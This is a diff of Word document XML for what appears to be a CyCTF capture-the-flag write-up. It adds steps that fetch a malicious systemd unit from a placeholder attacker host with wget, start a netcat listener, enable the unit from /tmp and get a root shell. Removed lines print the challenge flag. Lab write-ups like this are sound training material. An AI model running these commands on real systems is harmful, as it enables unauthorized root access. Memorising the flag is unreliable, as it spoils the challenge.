+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="288AA08A" wp14:editId="2C9B3050">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1716405</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>303530</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2360930" cy="285750"/>
+                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="986416895" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2360930" cy="285750"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>wget</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> http://LHOST/root.service</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>40000</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="288AA08A" id="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:135.15pt;margin-top:23.9pt;width:185.9pt;height:22.5pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:400;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:400;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>wget</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> http://LHOST/root.service</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosted</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the file on my </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>apache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server and downloaded it on target machine using </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">this </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>command :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B97D45" wp14:editId="387BCC67">
-            <wp:extent cx="5943600" cy="509270"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
-            <wp:docPr id="498882541" name="Picture 7" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F9560F7" wp14:editId="5DA465C5">
+            <wp:extent cx="5943600" cy="2595245"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="569445996" name="Picture 9" descr="A computer screen shot of a computer program"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3104,11 +7606,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="498882541" name="Picture 7" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPr id="569445996" name="Picture 9" descr="A computer screen shot of a computer program"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId38">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3122,7 +7624,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="509270"/>
+                      <a:ext cx="5943600" cy="2595245"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3137,69 +7639,530 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">8- we open the file content by 'cat /root/flag_HY6vXY' and we got the flag </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>"CyCTF{wjN7D-IdYdYupbQLhftMmz6QZnKqpt9sJJnYxxtjGKDwK-a1vfELh0rvQBrhgb3hB7kX2GtuTuuogFhY8NydXAOYpRLBfXfkXXeS}"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">establish a new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>listner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4197225D" wp14:editId="0C4949C8">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2286000</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>5080</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1152525" cy="333375"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1237369911" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1152525" cy="333375"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>nc</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> -</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>nlvp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> &lt;port&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="4197225D" id="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:180pt;margin-top:.4pt;width:90.75pt;height:26.25pt;z-index:251679744;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>nc</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> -</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>nlvp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">start the service </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>using :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11E86B83" wp14:editId="7297D0D4">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1371600</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>61595</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3068955" cy="333375"/>
+                <wp:effectExtent l="0" t="0" r="17145" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="567866225" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3068955" cy="333375"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="ListParagraph"/>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="34"/>
+                              </w:numPr>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>Systemctl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>enable/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>tmp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>root.service</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p/>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="11E86B83" id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:108pt;margin-top:4.85pt;width:241.65pt;height:26.25pt;z-index:251681792;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="ListParagraph"/>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="34"/>
+                        </w:numPr>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>Systemctl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>enable/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>tmp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>root.service</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p/>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="657F23A2" wp14:editId="090DCA48">
-            <wp:extent cx="5943600" cy="375920"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
-            <wp:docPr id="1363702724" name="Picture 8"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F323A1" wp14:editId="06ECD8CD">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="903334516" name="Picture 8" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3207,11 +8170,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1363702724" name="Picture 1363702724"/>
+                    <pic:cNvPr id="903334516" name="Picture 8" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId39" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3225,7 +8188,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="375920"/>
+                      <a:ext cx="5943600" cy="3343275"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3238,9 +8201,508 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set the root shell </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="011465DD" wp14:editId="08767FE2">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
